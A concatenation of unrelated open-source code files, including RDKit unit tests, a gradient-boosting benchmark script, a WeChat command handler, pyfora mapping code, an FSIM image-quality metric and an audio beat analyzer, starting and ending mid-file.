default_icom_directory = config["icom"]["patient_directories"]
return default_icom_directory
@st.cache
def get_default_gamma_options(config):
default_gamma_options = config["gamma"]
return default_gamma_options
@st.cache
def get_logfile_root_dir(config):
logfile_root_dir = pathlib.Path(config["trf_logfiles"]["root_directory"])
return logfile_root_dir
@st.cache
def get_indexed_backups_directory(config):
logfile_root_dir = get_logfile_root_dir(config)
indexed_backups_directory = logfile_root_dir.joinpath("diagnostics/already_indexed")
return indexed_backups_directory
@st.cache
def get_indexed_trf_directory(config):
logfile_root_dir = get_logfile_root_dir(config)
indexed_trf_directory = logfile_root_dir.joinpath("indexed")
return indexed_trf_directory
def get_gamma_options(config, advanced_mode):
default_gamma_options = get_default_gamma_options(config)
if advanced_mode:
st.sidebar.markdown(
"""
# Gamma parameters
"""
)
result = {
**default_gamma_options,
**{
"dose_percent_threshold": st.sidebar.number_input(
"MU Percent Threshold",
value=default_gamma_options["dose_percent_threshold"],
),
"distance_mm_threshold": st.sidebar.number_input(
"Distance (mm) Threshold",
value=default_gamma_options["distance_mm_threshold"],
),
"local_gamma": st.sidebar.checkbox(
"Local Gamma", default_gamma_options["local_gamma"]
),
"max_gamma": st.sidebar.number_input(
"Max Gamma", value=default_gamma_options["max_gamma"]
),
},
}
else:
result = default_gamma_options
return result
|
rdkit/DataStructs/UnitTestTopNContainer.py | kazuyaujihara/rdkit | 1,609 | 12653432 |
# $Id$
#
# Copyright (C) 2003-2006 Rational Discovery LLC
#
# @@ All Rights Reserved @@
# This file is part of the RDKit.
# The contents are covered by the terms of the BSD license
# which is included in the file license.txt, found at the root
# of the RDKit source tree.
#
import random
import unittest
from io import StringIO
from rdkit.DataStructs.TopNContainer import TopNContainer, _exampleCode
from rdkit.TestRunner import redirect_stdout
class TestCase(unittest.TestCase):
def test1(self):
# simple test with a known answer
cont = TopNContainer(4)
for foo in range(10):
cont.Insert(foo, str(foo))
assert cont.GetPts() == list(range(6, 10))
assert cont.GetExtras() == [str(x) for x in range(6, 10)]
def test2(self):
# larger scale random test
cont = TopNContainer(50)
for _ in range(1000):
cont.Insert(random.random())
vs = cont.GetPts()
last = vs.pop(0)
while vs:
assert vs[0] >= last
last = vs.pop(0)
def test3(self):
# random test with extras
cont = TopNContainer(10)
for _ in range(100):
v = random.random()
cont.Insert(v, v + 1)
vs = cont.GetExtras()
last = vs.pop(0)
while vs:
assert vs[0] >= last
last = vs.pop(0)
def test4(self):
# random test with extras and getitem
cont = TopNContainer(10)
for i in range(100):
v = random.random()
cont.Insert(v, v + 1)
lastV, lastE = cont[0]
for i in range(1, len(cont)):
v, e = cont[i]
assert v >= lastV
assert e >= lastE
lastV, lastE = v, e
def test5(self):
# random test with extras and getitem, include reverse
cont = TopNContainer(10)
for i in range(100):
v = random.random()
cont.Insert(v, v + 1)
cont.reverse()
lastV, lastE = cont[0]
for i in range(1, len(cont)):
v, e = cont[i]
assert v <= lastV
assert e <= lastE
lastV, lastE = v, e
def test_keepAll(self):
# simple test with a known answer where we keep all
cont = TopNContainer(-1)
for i in range(10):
cont.Insert(9 - i, str(9 - i))
self.assertEqual(len(cont), i + 1)
assert cont.GetPts() == list(range(10))
assert cont.GetExtras() == [str(x) for x in range(10)]
def test_exampleCode(self):
# We make sure that the example code runs
f = StringIO()
with redirect_stdout(f):
_exampleCode()
s = f.getvalue()
self.assertIn('[58, 75, 78, 84]', s)
if __name__ == '__main__': # pragma: nocover
unittest.main()
|
crates/tree/benchmarks/boston.py | OneToolsCollection/tangramdotdev-tangram | 957 | 12653441 |
from pandas.api.types import CategoricalDtype
from sklearn.metrics import mean_squared_error
import argparse
import numpy as np
import pandas as pd
import json
parser = argparse.ArgumentParser()
parser.add_argument('--library', choices=['h2o', 'lightgbm', 'sklearn', 'xgboost', 'catboost'], required=True)
args = parser.parse_args()
# Load the data.
path_train = 'data/boston_train.csv'
path_test = 'data/boston_test.csv'
target_column_name = "medv"
chas_options = ["0", "1"]
dtype = {
'crim': np.float64,
'zn': np.float64,
'indus': np.float64,
'chas': CategoricalDtype(categories=chas_options),
'nox': np.float64,
'rm': np.float64,
'age': np.float64,
'dis': np.float64,
'rad': np.int64,
'tax': np.float64,
'ptratio': np.float64,
'b': np.float64,
'lstat': np.float64,
}
data_train = pd.read_csv(path_train, dtype=dtype)
data_test = pd.read_csv(path_test, dtype=dtype)
if args.library == 'xgboost' or args.library == 'sklearn' or args.library == 'catboost':
categorical_columns = data_train.select_dtypes(['category']).columns
data_train.loc[:, categorical_columns] = data_train.loc[:, categorical_columns].apply(lambda x: x.cat.codes)
data_test.loc[:, categorical_columns] = data_test.loc[:, categorical_columns].apply(lambda x: x.cat.codes)
labels_train = data_train.pop(target_column_name)
features_train = data_train
labels_test = data_test.pop(target_column_name)
features_test = data_test
# Train the model.
if args.library == 'h2o':
import h2o
from h2o.estimators import H2OGradientBoostingEstimator
h2o.init()
data_train = pd.concat([features_train, labels_train], axis=1)
data_test = pd.concat([features_test, labels_test], axis=1)
data_train = h2o.H2OFrame(python_obj=data_train)
data_test = h2o.H2OFrame(python_obj=data_test)
feature_column_names = [column for column in data_train.columns if column != target_column_name]
model = H2OGradientBoostingEstimator(
distribution="gaussian",
learn_rate=0.1,
ntrees=100,
)
model.train(
training_frame=data_train,
y=target_column_name,
x=feature_column_names,
)
elif args.library == 'lightgbm':
import lightgbm as lgb
model = lgb.LGBMRegressor(
learning_rate=0.1,
n_estimators=100,
num_leaves=255,
)
model.fit(features_train, labels_train)
elif args.library == 'sklearn':
from sklearn.experimental import enable_hist_gradient_boosting
from sklearn.ensemble import HistGradientBoostingRegressor
model = HistGradientBoostingRegressor(
learning_rate=0.1,
max_iter=100,
max_leaf_nodes=255,
validation_fraction=None,
)
model.fit(features_train, labels_train)
elif args.library == 'xgboost':
import xgboost as xgb
model = xgb.XGBRegressor(
eta=0.1,
eval_metric='logloss',
grow_policy='lossguide',
max_leaves=255,
n_estimators=100,
tree_method='hist',
use_label_encoder=False,
)
model.fit(features_train, labels_train)
elif args.library == 'catboost':
from catboost import CatBoostRegressor
model = CatBoostRegressor(
grow_policy='Lossguide',
learning_rate=0.1,
n_estimators=100,
num_leaves=255,
train_dir='data/catboost_info',
verbose=False
)
model.fit(features_train, labels_train, silent=True)
# Make predictions on the test data.
if args.library == 'h2o':
predictions = model.predict(data_test).as_data_frame()
else:
predictions = model.predict(features_test)
# Compute metrics.
mse = mean_squared_error(predictions, labels_test)
print(json.dumps({
'mse': mse,
}))
|
Recycled/wechatservice/route.py | lifg2000/StockAnalysisSystem | 138 | 12653460 |
import time
import hashlib
from flask import request
from .wechat import WeChat
from StockAnalysisSystem.core.config import Config
wechat: WeChat = None
SasUserWxUserDict = {
}
WxUserSasUserDict = {
}
# ----------------------------------------------------------------------------------------------------------------------
def handle_cmd_test(parameters: str, flask_request: request, msg_dict: dict) -> str:
wechat_user = msg_dict.get('FromUserName', '')
if wechat_user not in WxUserSasUserDict.keys():
return ''
user_mgr = wechat.get_user_manager()
user_lst = user_mgr.get_user_list()
if len(user_lst) > 0:
wechat.send_user_message(user_lst[0], 'Hello from Sleepy')
return 'Test Execute Done'
def handle_cmd_login(parameters: str, flask_request: request, msg_dict: dict) -> str:
parts = parameters.split(',')
username = (parts[0] if len(parts) > 0 else '').strip()
password = (parts[1] if len(parts) > 1 else '').strip()
passwd_sha1 = hashlib.sha1(password.encode('utf-8')).hexdigest()
    if username == 'Sleepy' and passwd_sha1 == '<PASSWORD>':
wechat_user = msg_dict.get('FromUserName', '')
if wechat_user != '':
SasUserWxUserDict[username] = wechat_user
WxUserSasUserDict[wechat_user] = username
wechat.get_user_manager().update_user_session(wechat_user, 'login', time.time())
return 'Login Successful'
return ''
def handle_cmd_logoff(parameters: str, flask_request: request, msg_dict: dict) -> str:
username = parameters.strip()
if username != '' and username in SasUserWxUserDict.keys():
wechat_user = SasUserWxUserDict[username]
wechat.get_user_manager().update_user_session(wechat_user, 'login', 0)
del SasUserWxUserDict[username]
del WxUserSasUserDict[wechat_user]
# ----------------------------------------------------------------------------------------------------------------------
def parse_command(text: str) -> (str, str):
parts = text.split(':')
command = (parts[0] if len(parts) > 0 else '').strip()
parameters = (parts[1] if len(parts) > 1 else '').strip()
return command, parameters
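# e.g. (illustrative) parse_command("login: user, secret") -> ("login", "user, secret")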
def handle_command(flask_request: request, msg_dict: dict) -> (bool, str):
content: str = msg_dict.get('Content', '')
command, parameters = parse_command(content)
if command == 'test':
return True, handle_cmd_test(parameters, flask_request, msg_dict)
if command == 'login':
return True, handle_cmd_login(parameters, flask_request, msg_dict)
if command == 'logoff':
return True, handle_cmd_logoff(parameters, flask_request, msg_dict)
return False, ''
def handle_analysis(flask_request: request, msg_dict: dict) -> (bool, str):
content = msg_dict.get('Content', '')
    return True, ('<a href="http://172.16.58.3/analysis?security=%s">查看分析结果</a>' % content)  # link text: "View analysis results"
def handle_text_message(flask_request: request, msg_dict: dict) -> str:
ret, resp = handle_command(flask_request, msg_dict)
if ret:
return resp
ret, resp = handle_analysis(flask_request, msg_dict)
if ret:
return resp
return ''
# ----------------------------------------------------------------------------------------------------------------------
def handle_request(flask_request: request) -> str:
global wechat
return wechat.handle_request(flask_request)
# ----------------------------------------------------------------------------------------------------------------------
def load_config(config: Config):
wechat_token = config.get('wechat_token', '')
wechat_app_id = config.get('wechat_app_id', '')
wechat_app_secret = config.get('wechat_app_secret', '')
print('Load config - WeChat Token: %s' % wechat_token)
print('Load config - WeChat App ID: %s' % wechat_app_id)
print('Load config - WeChat App Secret: %s' % wechat_app_id)
global wechat
wechat.set_token(wechat_token)
wechat.set_app_id(wechat_app_id)
wechat.set_app_secret(wechat_app_secret)
def init(config: Config):
global wechat
wechat = WeChat()
load_config(config)
wechat.set_msg_handler('text', handle_text_message)
|
packages/python/pyfora/PureImplementationMappings.py | ufora/ufora | 571 | 12653466 |
# Copyright 2015 Ufora Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import imp
import importlib
import os
import sys
from pyfora.PureImplementationMapping import PureMappingRegistry
def typeOfInstance(i):
try:
return i.__class__
except AttributeError:
return type(i)
class PureImplementationMappings(object):
"""Collection of PureImplementationMapping objects"""
def __init__(self):
self.last_seen_sys_modules_len = 0
self.already_loaded = set()
self.mappings = []
self.pythonTypeToMapping = {}
self.pyforaTypeToMapping = {}
self.pythonInstanceIdsToMappingAndId = {}
self.opacity_by_module_name = {}
def isOpaqueModule(self, module):
"""Is this module a system module none of whose pieces has a valid mapping?
If so, then we can treat the entire module as unmappable and we don't need
to recurse into its interior when mapping its values.
"""
name = module.__name__
if name in self.opacity_by_module_name:
return self.opacity_by_module_name[name]
self.opacity_by_module_name[name] = self._isOpaqueModuleUncached(module)
return self.opacity_by_module_name[name]
def _isOpaqueModuleUncached(self, module):
self.load_pure_modules()
if module.__name__ in self.already_loaded:
#this module has pure elements.
return False
if "." in module.__name__ and module.__name__.split(".")[0] in self.already_loaded:
#this module has pure elements.
return False
if not hasattr(module, '__file__'):
#this is a builtin module, like 'sys'
return True
if not module.__file__.startswith(sys.prefix):
#this is user code
return False
return True
def addMapping(self, mapping):
self.mappings.append(mapping)
for mappableType in mapping.getMappablePythonTypes():
self.pythonTypeToMapping[mappableType] = mapping
for purePythonType in mapping.getPurePythonTypes():
self.pyforaTypeToMapping[purePythonType] = mapping
for instance in mapping.getMappableInstances():
self.pythonInstanceIdsToMappingAndId[id(instance)] = (mapping, instance)
def canMap(self, instance):
self.load_pure_modules()
return (
typeOfInstance(instance) in self.pythonTypeToMapping or
id(instance) in self.pythonInstanceIdsToMappingAndId
)
def canInvert(self, instance):
return typeOfInstance(instance) in self.pyforaTypeToMapping
def canInvertInstancesOf(self, classMapping):
return classMapping in self.pyforaTypeToMapping
def mappableInstanceToPure(self, instance):
if id(instance) in self.pythonInstanceIdsToMappingAndId:
mapper = self.pythonInstanceIdsToMappingAndId[id(instance)][0]
else:
mapper = self.pythonTypeToMapping[typeOfInstance(instance)]
return mapper.mapPythonInstanceToPyforaInstance(instance)
def pureInstanceToMappable(self, instance):
mapper = self.pyforaTypeToMapping[typeOfInstance(instance)]
return mapper.mapPyforaInstanceToPythonInstance(instance)
def load_pure_modules(self):
if len(sys.modules) <= self.last_seen_sys_modules_len:
return
loaded_modules = sys.modules.keys()
loaded_root_modules = set(m.split('.')[0] for m in loaded_modules)
for root in loaded_root_modules:
if root in self.already_loaded or root == 'pyfora':
continue
self.try_load_pure_module(root)
self.last_seen_sys_modules_len = len(sys.modules)
def addMappingsForModule(self, module_name):
for mapping in PureMappingRegistry.mappingsForRootModule(module_name):
self.addMapping(mapping)
self.already_loaded.add(module_name)
def try_load_pure_module(self, module_name):
try:
# first try to load a pyfora pure module, if one exists
importlib.import_module("pyfora.pure_modules.pure_" + module_name)
self.addMappingsForModule(module_name)
except ImportError:
pass
pyfora_path = os.getenv('PYFORAPATH')
if pyfora_path is None:
return
for mod in [module_name, "pure_" + module_name]:
path = os.path.join(pyfora_path, mod)
if os.path.exists(path) or os.path.exists(path + '.py'):
try:
load_args = imp.find_module(mod, pyfora_path)
imp.load_module("pyfora.user_pure_modules.pure_" + mod, *load_args)
self.addMappingsForModule(module_name)
except ImportError:
pass
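# Minimal usage sketch (assumed API surface, for illustration only):
#   mappings = PureImplementationMappings()
#   if mappings.canMap(obj):
#       pure_obj = mappings.mappableInstanceToPure(obj)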
|
api/views.py | annevandalfsen/screenbird | 121 | 12653478 |
def config_record_on_account(request,account_id):
pass
def config_record_on_channel(request, channel_id):
pass
|
scripts/mesh/mesh_uploader.py | AlfiyaRF/cloud-pipeline | 126 | 12653490 |
# Copyright 2017-2020 EPAM Systems, Inc. (https://www.epam.com/)
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import argparse
from src.mesh_file_manager import MeshStructureFileManager
from src.mesh_parser import get_parser
from src.mesh_tree_uploader import get_uploader
from src.ontology_type import OntologyType
def main():
parser = argparse.ArgumentParser()
parser.add_argument("--url", type=str, required=True)
parser.add_argument("--type", type=str, required=True)
parser.add_argument("--tmp_path", type=str, required=False)
args = parser.parse_args()
url_path = args.url
tmp_path = args.tmp_path
ontology_type = args.type
if ontology_type not in OntologyType.get_allowed():
raise RuntimeError("Unsupported ontology type '%s'. Allowed types: %s" %
(ontology_type, ", ".join(OntologyType.get_allowed())))
file_manager = MeshStructureFileManager(tmp_path, ontology_type)
try:
path = file_manager.download(url_path)
print("Mesh structure successfully downloaded to path '%s'" % path)
tree, root_id = get_parser(ontology_type).parse(path)
print("Mesh structure successfully parsed. Found '%d' records" % len(tree.nodes))
get_uploader(ontology_type, tree, root_id).upload_tree()
print("Mesh structure successfully uploaded!")
except Exception as e:
file_manager.delete()
raise e
file_manager.delete()
if __name__ == "__main__":
main()
|
loss/IQA/fsim.py | milesgray/CALAE | 203 | 12653495 |
import numpy as np
import os
import sys
import torch
from torchvision import models,transforms
import torch.nn as nn
import torch.nn.functional as F
import inspect
from numpy.fft import fft2, ifft2, fftshift, ifftshift
import math
from .utils import abs, real, imag, downsample
def lowpassfilter(size, cutoff, n):
"""
Constructs a low-pass Butterworth filter:
f = 1 / (1 + (w/cutoff)^2n)
usage: f = lowpassfilter(sze, cutoff, n)
where: size is a tuple specifying the size of filter to construct
[rows cols].
cutoff is the cutoff frequency of the filter 0 - 0.5
n is the order of the filter, the higher n is the sharper
the transition is. (n must be an integer >= 1). Note
that n is doubled so that it is always an even integer.
The frequency origin of the returned filter is at the corners.
"""
if cutoff < 0. or cutoff > 0.5:
raise Exception('cutoff must be between 0 and 0.5')
elif n % 1:
raise Exception('n must be an integer >= 1')
if len(size) == 1:
rows = cols = size
else:
rows, cols = size
if (cols % 2):
xvals = np.arange(-(cols - 1) / 2.,
((cols - 1) / 2.) + 1) / float(cols - 1)
else:
xvals = np.arange(-cols / 2., cols / 2.) / float(cols)
if (rows % 2):
yvals = np.arange(-(rows - 1) / 2.,
((rows - 1) / 2.) + 1) / float(rows - 1)
else:
yvals = np.arange(-rows / 2., rows / 2.) / float(rows)
x, y = np.meshgrid(xvals, yvals, sparse=True)
radius = np.sqrt(x * x + y * y)
return ifftshift(1. / (1. + (radius / cutoff) ** (2. * n)))
def filtergrid(rows, cols):
# Set up u1 and u2 matrices with ranges normalised to +/- 0.5
u1, u2 = np.meshgrid(np.linspace(-0.5, 0.5, cols, endpoint=(cols % 2)),
np.linspace(-0.5, 0.5, rows, endpoint=(rows % 2)),
sparse=True)
# Quadrant shift to put 0 frequency at the top left corner
u1 = ifftshift(u1)
u2 = ifftshift(u2)
# Compute frequency values as a radius from centre (but quadrant shifted)
radius = np.sqrt(u1 * u1 + u2 * u2)
return radius, u1, u2
def phasecong2(im):
nscale = 4
norient = 4
minWaveLength = 6
mult = 2
sigmaOnf = 0.55
dThetaOnSigma = 1.2
k = 2.0
epsilon = .0001
thetaSigma = np.pi/norient/dThetaOnSigma
_, _, rows,cols = im.shape
imagefft = torch.rfft(im,2,onesided=False)
lp = lowpassfilter((rows,cols),.45,15)
radius, _, _ = filtergrid(rows, cols)
radius[0, 0] = 1.
logGaborList = []
logGaborDenom = 2. * np.log(sigmaOnf) ** 2.
for s in range(nscale):
wavelength = minWaveLength * mult ** s
fo = 1. / wavelength # Centre frequency of filter
logRadOverFo = (np.log(radius / fo))
logGabor = np.exp(-(logRadOverFo * logRadOverFo) / logGaborDenom)
logGabor *= lp # Apply the low-pass filter
logGabor[0, 0] = 0. # Undo the radius fudge
logGaborList.append(logGabor)
# Matrix of radii
cy = np.floor(rows/2)
cx = np.floor(cols/2)
y, x = np.mgrid[0:rows, 0:cols]
y = (y-cy)/rows
x = (x-cx)/cols
radius = np.sqrt(x**2 + y**2)
theta = np.arctan2(-y, x)
radius = ifftshift(radius) # Quadrant shift radius and theta so that filters
theta = ifftshift(theta) # are constructed with 0 frequency at the corners.
radius[0,0] = 1
sintheta = np.sin(theta)
costheta = np.cos(theta)
spreadList = []
for o in np.arange(norient):
angl = o*np.pi/norient # Filter angle.
ds = sintheta * math.cos(angl) - costheta * math.sin(angl) # Difference in sine.
dc = costheta * math.cos(angl) + sintheta * math.sin(angl) # Difference in cosine.
dtheta = np.abs(np.arctan2(ds,dc)) # Absolute angular distance.
# dtheta = np.minimum(dtheta*NumberAngles/2, math.pi)
        spread = np.exp((-dtheta**2) / (2 * thetaSigma**2))  # Calculate the angular spread of the filter
spreadList.append(spread)
ifftFilterArray = [[],[],[],[]]
filterArray = [[],[],[],[]]
for o in np.arange(norient):
for s in np.arange(nscale):
filter = logGaborList[s] * spreadList[o]
filterArray[o].append(torch.from_numpy(filter).reshape(1,1,rows,cols).float().to(im.device))
ifftFilt = np.real(ifft2(filter))*math.sqrt(rows*cols)
ifftFilterArray[o].append(torch.from_numpy(ifftFilt).reshape(1,1,rows,cols).float().to(im.device))
EnergyAll = 0
AnAll = 0
for o in np.arange(norient):
sumE_ThisOrient = 0
sumO_ThisOrient = 0
sumAn_ThisOrient = 0
Energy = 0
MatrixEOList = []
for s in np.arange(nscale):
filter = filterArray[o][s]
c = imagefft * filter.unsqueeze(-1).repeat(1,1,1,1,2)
MatrixEO = torch.ifft(imagefft * filter.unsqueeze(-1).repeat(1,1,1,1,2), 2)
MatrixEOList.append(MatrixEO)
An = abs(MatrixEO) # Amplitude of even & odd filter response.
sumAn_ThisOrient = sumAn_ThisOrient + An # Sum of amplitude responses.
sumE_ThisOrient = sumE_ThisOrient + real(MatrixEO) # Sum of even filter convolution results.
sumO_ThisOrient = sumO_ThisOrient + imag(MatrixEO) # Sum of odd filter convolution results.
if s == 0:
EM_n = torch.sum(filter**2,dim=[1,2,3])
maxAn = An
else:
maxAn = torch.max(maxAn,An)
XEnergy = torch.sqrt(sumE_ThisOrient**2 + sumO_ThisOrient**2+1e-12) + epsilon
MeanE = sumE_ThisOrient / XEnergy
MeanO = sumO_ThisOrient / XEnergy
for s in np.arange(nscale):
EO = MatrixEOList[s]
E = real(EO)
O = imag(EO)
Energy = Energy + E*MeanE + O*MeanO - torch.abs(E*MeanO - O*MeanE)
meanE2n = torch.median((abs(MatrixEOList[0])**2).view(im.shape[0],-1),dim=1)[0] / -math.log(0.5)
noisePower = meanE2n/EM_n
EstSumAn2 = 0
for s in np.arange(nscale):
EstSumAn2 = EstSumAn2 + ifftFilterArray[o][s]**2
EstSumAiAj = 0
for si in np.arange(nscale-1):
for sj in np.arange(si+1,nscale):
EstSumAiAj = EstSumAiAj + ifftFilterArray[o][si]*ifftFilterArray[o][sj]
sumEstSumAn2 = torch.sum(EstSumAn2,dim=[1,2,3])
sumEstSumAiAj = torch.sum(EstSumAiAj,dim=[1,2,3])
EstNoiseEnergy2 = 2*noisePower*sumEstSumAn2 + 4*noisePower*sumEstSumAiAj
tau = torch.sqrt(EstNoiseEnergy2/2+1e-12)
EstNoiseEnergySigma = torch.sqrt( (2-math.pi/2)*tau**2 +1e-12)
T = tau*math.sqrt(math.pi/2) + k*EstNoiseEnergySigma
T = T/1.7
Energy = F.relu(Energy - T.view(-1,1,1,1))
EnergyAll = EnergyAll + Energy
AnAll = AnAll + sumAn_ThisOrient
ResultPC = EnergyAll / AnAll
return ResultPC
def fsim(imageRef, imageDis):
channels = imageRef.shape[1]
if channels == 3:
Y1 = (0.299 * imageRef[:,0,:,:] + 0.587 * imageRef[:,1,:,:] + 0.114 * imageRef[:,2,:,:]).unsqueeze(1)
Y2 = (0.299 * imageDis[:,0,:,:] + 0.587 * imageDis[:,1,:,:] + 0.114 * imageDis[:,2,:,:]).unsqueeze(1)
I1 = (0.596 * imageRef[:,0,:,:] - 0.274 * imageRef[:,1,:,:] - 0.322 * imageRef[:,2,:,:]).unsqueeze(1)
I2 = (0.596 * imageDis[:,0,:,:] - 0.274 * imageDis[:,1,:,:] - 0.322 * imageDis[:,2,:,:]).unsqueeze(1)
Q1 = (0.211 * imageRef[:,0,:,:] - 0.523 * imageRef[:,1,:,:] + 0.312 * imageRef[:,2,:,:]).unsqueeze(1)
Q2 = (0.211 * imageDis[:,0,:,:] - 0.523 * imageDis[:,1,:,:] + 0.312 * imageDis[:,2,:,:]).unsqueeze(1)
Y1, Y2 = downsample(Y1, Y2)
I1, I2 = downsample(I1, I2)
Q1, Q2 = downsample(Q1, Q2)
elif channels == 1:
Y1, Y2 = downsample(imageRef, imageDis)
else:
raise ValueError('channels error')
PC1 = phasecong2(Y1)
PC2 = phasecong2(Y2)
dx = torch.Tensor([[3, 0, -3], [10, 0, -10], [3, 0, -3]]).float()/16
dy = torch.Tensor([[3, 10, 3], [0, 0, 0], [-3, -10, -3]]).float()/16
dx = dx.reshape(1,1,3,3).to(imageRef.device)
dy = dy.reshape(1,1,3,3).to(imageRef.device)
IxY1 = F.conv2d(Y1, dx, stride=1, padding =1)
IyY1 = F.conv2d(Y1, dy, stride=1, padding =1)
gradientMap1 = torch.sqrt(IxY1**2 + IyY1**2+1e-12)
IxY2 = F.conv2d(Y2, dx, stride=1, padding =1)
IyY2 = F.conv2d(Y2, dy, stride=1, padding =1)
gradientMap2 = torch.sqrt(IxY2**2 + IyY2**2+1e-12)
T1 = 0.85
T2 = 160
PCSimMatrix = (2 * PC1 * PC2 + T1) / (PC1**2 + PC2**2 + T1)
gradientSimMatrix = (2*gradientMap1*gradientMap2 + T2)/(gradientMap1**2 + gradientMap2**2 + T2)
PCm = torch.max(PC1, PC2)
SimMatrix = gradientSimMatrix * PCSimMatrix * PCm
FSIM_val = torch.sum(SimMatrix,dim=[1,2,3]) / torch.sum(PCm,dim=[1,2,3])
if channels==1:
return FSIM_val
T3 = 200
T4 = 200
ISimMatrix = (2 * I1 * I2 + T3) / (I1**2 + I2**2 + T3)
QSimMatrix = (2 * Q1 * Q2 + T4) / (Q1**2 + Q2**2 + T4)
SimMatrixC = gradientSimMatrix * PCSimMatrix * PCm * \
torch.sign(gradientSimMatrix) * ((torch.abs(ISimMatrix * QSimMatrix)+1e-12) ** 0.03)
return torch.sum(SimMatrixC,dim=[1,2,3]) / torch.sum(PCm,dim=[1,2,3])
class FSIM(torch.nn.Module):
# Refer to https://sse.tongji.edu.cn/linzhang/IQA/FSIM/FSIM.htm
def __init__(self, channels=3):
super(FSIM, self).__init__()
def forward(self, y, x, as_loss=True):
assert x.shape == y.shape
x = x * 255
y = y * 255
if as_loss:
score = fsim(x, y)
return 1 - score.mean()
else:
with torch.no_grad():
score = fsim(x, y)
return score
if __name__ == '__main__':
from PIL import Image
import argparse
from utils import prepare_image
parser = argparse.ArgumentParser()
parser.add_argument('--ref', type=str, default='images/r0.png')
parser.add_argument('--dist', type=str, default='images/r1.png')
args = parser.parse_args()
device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')
ref = prepare_image(Image.open(args.ref).convert("RGB"), repeatNum = 1).to(device)
dist = prepare_image(Image.open(args.dist).convert("RGB"), repeatNum = 1).to(device)
model = FSIM(channels=3).to(device)
score = model(dist, ref, as_loss=False)
print('score: %.4f' % score.item())
# score: 0.7843
|
AudioOwl/analyze.py | davisnando/AudioOwl | 178 | 12653511 | import librosa
import madmom
from madmom.features.beats import *
from scipy import signal
import numpy as np
def peak_picking(beat_times, total_samples, kernel_size, offset):
# smoothing the beat function
cut_off_norm = len(beat_times)/total_samples*100/2
b, a = signal.butter(1, cut_off_norm)
beat_times = signal.filtfilt(b, a, beat_times)
# creating a list of samples for the rnn beats
beat_samples = np.linspace(0, total_samples, len(beat_times), endpoint=True, dtype=int)
n_t_medians = signal.medfilt(beat_times, kernel_size=kernel_size)
    offset = 0.01  # note: this fixed value overrides the offset argument passed to peak_picking
peaks = []
for i in range(len(beat_times)-1):
if beat_times[i] > 0:
if beat_times[i] > beat_times[i-1]:
if beat_times[i] > beat_times[i+1]:
if beat_times[i] > (n_t_medians[i] + offset):
peaks.append(int(beat_samples[i]))
return peaks
def analyze(y, sr):
data = {}
# sample rate
data['sample_rate'] = sr
# getting duration in seconds
data['duration'] = librosa.get_duration(y=y, sr=sr)
# beats prediction
# rnn_processor = RNNBeatProcessor()
# beats = rnn_processor(y)
rnn_processor = RNNBeatProcessor(post_processor=None)
predictions = rnn_processor(y)
mm_processor = MultiModelSelectionProcessor(num_ref_predictions=None)
beats = mm_processor(predictions)
data['beat_samples'] = peak_picking(beats, len(y), 5, 0.01)
if len(data['beat_samples']) < 3:
data['beat_samples'] = peak_picking(beats, len(y), 25, 0.01)
if data['beat_samples'] == []:
data['beat_samples'] = [0]
data['number_of_beats'] = len(data['beat_samples'])
# tempo
data['tempo_float'] = (len(data['beat_samples'])-1)*60/data['duration']
data['tempo_int'] = int(data['tempo_float'])
# noisiness featues
data['zero_crossing'] = librosa.feature.zero_crossing_rate(y)[0].tolist()
data['noisiness_median'] = float(np.median(data['zero_crossing']))
data['noisiness_sum'] = sum( librosa.zero_crossings(y)/y.shape[0] )
# spectral features
notes = []
try:
chroma = librosa.feature.chroma_cqt(y, n_chroma=12, bins_per_octave=12, n_octaves=8, hop_length=512)
# CONVERSION TABLE
# 0 c 261.63
# 1 c# 277.18
# 2 d 293.66
# 3 d# 311.13
# 4 e 329.63
# 5 f 349.23
# 6 f# 369.99
# 7 g 392.00
# 8 g# 415.30
# 9 a 440.00
# 10 a# 466.16
# 11 b 493.88
for col in range(chroma.shape[1]):
notes.append(int(np.argmax(chroma[:,col])))
data['notes'] = notes
data['dominant_note'] = int(np.argmax(np.bincount(np.array(notes))))
except:
data['notes'] = [0]
data['dominant_note'] = 0
return data
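if __name__ == '__main__':
    # Minimal usage sketch (hypothetical audio path, not part of the original module)
    y, sr = librosa.load('example.wav', sr=None)
    features = analyze(y, sr)
    print(features['tempo_int'], features['number_of_beats'])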
|
contrib/performance/_event_change.py | backwardn/ccs-calendarserver | 462 | 12653525 |
##
# Copyright (c) 2010-2017 Apple Inc. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
##
"""
Benchmark a server's handling of event summary changes.
"""
from itertools import count
from urllib2 import HTTPDigestAuthHandler
from twisted.internet import reactor
from twisted.internet.defer import inlineCallbacks, returnValue
from twisted.web.client import Agent
from twisted.web.http_headers import Headers
from twisted.web.http import NO_CONTENT
from httpauth import AuthHandlerAgent
from httpclient import StringProducer
from benchlib import initialize, sample
from _event_create import makeEvent
@inlineCallbacks
def measure(host, port, dtrace, attendeeCount, samples, fieldName,
replacer, eventPerSample=False):
user = password = "<PASSWORD>"
root = "/"
principal = "/"
calendar = "event-%s-benchmark" % (fieldName,)
authinfo = HTTPDigestAuthHandler()
authinfo.add_password(
realm="Test Realm",
uri="http://%s:%d/" % (host, port),
user=user,
passwd=password)
agent = AuthHandlerAgent(Agent(reactor), authinfo)
# Set up the calendar first
yield initialize(agent, host, port, user, password, root, principal, calendar)
if eventPerSample:
# Create an event for each sample that will be taken, so that no event
# is used for two different samples.
f = _selfish_sample
else:
